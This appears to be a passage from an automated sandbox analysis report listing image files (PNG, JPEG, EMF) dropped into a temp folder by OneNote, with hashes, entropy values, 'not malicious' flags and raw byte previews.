                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0ADD2075-FC2D-4FE2-8CC6-B108848904AE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0B288449-5196-46A3-9158-AC6D386F2789}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0B2C0A07-4D7F-43E9-A25B-57703029B751}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0BD71FC8-8292-4D13-A9E6-09DE59A219A9}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0CEC181F-ED63-409F-BEDC-D0F58B320978}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4819
                                                                                                                                                                                                                  Entropy (8bit):7.874649683222419
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                                                                                                  MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                                                                                                  SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                                                                                                  SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                                                                                                  SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{0EA5C00C-EC0D-474A-825D-4DC15FDA5844}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                                  Entropy (8bit):7.845368393313232
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                                  MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                                  SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                                  SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                                  SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{10727504-E718-4D56-9B30-472206688922}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{114B83D3-5F05-4C22-97AB-72AEB826B1AE}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{11C41906-8F74-4E57-BA80-E6436C1D74DD}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):109698
                                                                                                                                                                                                                  Entropy (8bit):7.954100577911302
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:3072:rDlmvIWr0aRtNCfShCWBxyCHMlcVG0Ezy4FR:rDliIfot8ahCWBcCHDVwR
                                                                                                                                                                                                                  MD5:8D804A60E86627383BED6280ED62F1CF
                                                                                                                                                                                                                  SHA1:E23FF14B10AD0762DD67FBA3CD6EFC85647C0384
                                                                                                                                                                                                                  SHA-256:494547E566FB7A63DD429EB0699FE41AA8998F8EA2F758D813FE3D56C3075719
                                                                                                                                                                                                                  SHA-512:0FB19F3D00159F2748C3A54E952E551B9FEA6910D67A54DECA8D099992E50383EADB92768FF1F75CFFAE82A7A157B1E0F77A2F0BE7EC64FD2324304FDCA46577
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...............................................................................................!"#.123..AQB$..aq.RCS...b..c4%..rs..D&....5E6'..TdUte...u.....FV...7.......................!"..1A2B..QaqR.#.br3.........C%...$5.....c4U..Eeu&SsD.6T..................?.....O.C.....^..R<A.g...[....3.....r.0.....nX.S....}...[.?Z.....A.?..~~I..rY|N.o...9......!...o7r../-.y...'5.3.U.s".-.0.1......SS...&.Q.j.*.$m.e..:x....`}...EP.?.7..~G(so.......O.....z.N..<....~^a.e...........p9.?<._..|......~.<@.D.9..G..?.?z.y?z.C.U.w..[.,..A.+........s......g...G.^....pz.xY.....d8.y.X...P..O(A.O..~:._.......<...o..4s..^.^b..x......_a.....|{c...:..X.....}.._...[?..NK.c...}.<......H.G....+x.Z..|....n...o....`.nk.#.%x......-|...|7......N!=././..w.8x.".8....'x........w...,>....j[w8a..}..lS..?.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{11FD383E-690D-4C4E-B564-68AA0549C33E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):86187
                                                                                                                                                                                                                  Entropy (8bit):7.951356272886186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                                                                                                  MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                                                                                                  SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                                                                                                  SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                                                                                                  SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{12895D0F-6702-4E14-B74A-61F6015DF738}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):33032
                                                                                                                                                                                                                  Entropy (8bit):2.941351060644542
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
                                                                                                                                                                                                                  MD5:ACF4A9F470281F475EA45E113E9FB009
                                                                                                                                                                                                                  SHA1:B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
                                                                                                                                                                                                                  SHA-256:5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
                                                                                                                                                                                                                  SHA-512:998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{13318DA1-E908-4B6F-B22D-597C11719E13}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 88 x 574, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19920
                                                                                                                                                                                                                  Entropy (8bit):7.987696084459766
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:DRSgtAxJx7bzvAsVSqQElOT4uHmpmvNYT9aPU+QtsC2LgfIqJZnbeyRB:DsgaN7bzvAsVdK4uGQFUZ6bU/p3
                                                                                                                                                                                                                  MD5:1BDAD9B3B6DE549162F9567697389E1C
                                                                                                                                                                                                                  SHA1:5D9C09159F07A3A9BDCC6C4B9BD9CB72D0184E6F
                                                                                                                                                                                                                  SHA-256:0908A4CFA23F93011176D47F45843E9CA2973030421996E8E27484781F54B0EC
                                                                                                                                                                                                                  SHA-512:475040779AC247BB5C3E11862FB55FBDDFA12D759EE86A33E11BC1F3B656D6CD0F9B25146C0113E43E1D8001D8867D3BC3BF7E6FE21F3A0016CB1F8B70B7A15A
                                                                                                                                                                                                                  Malicious:false
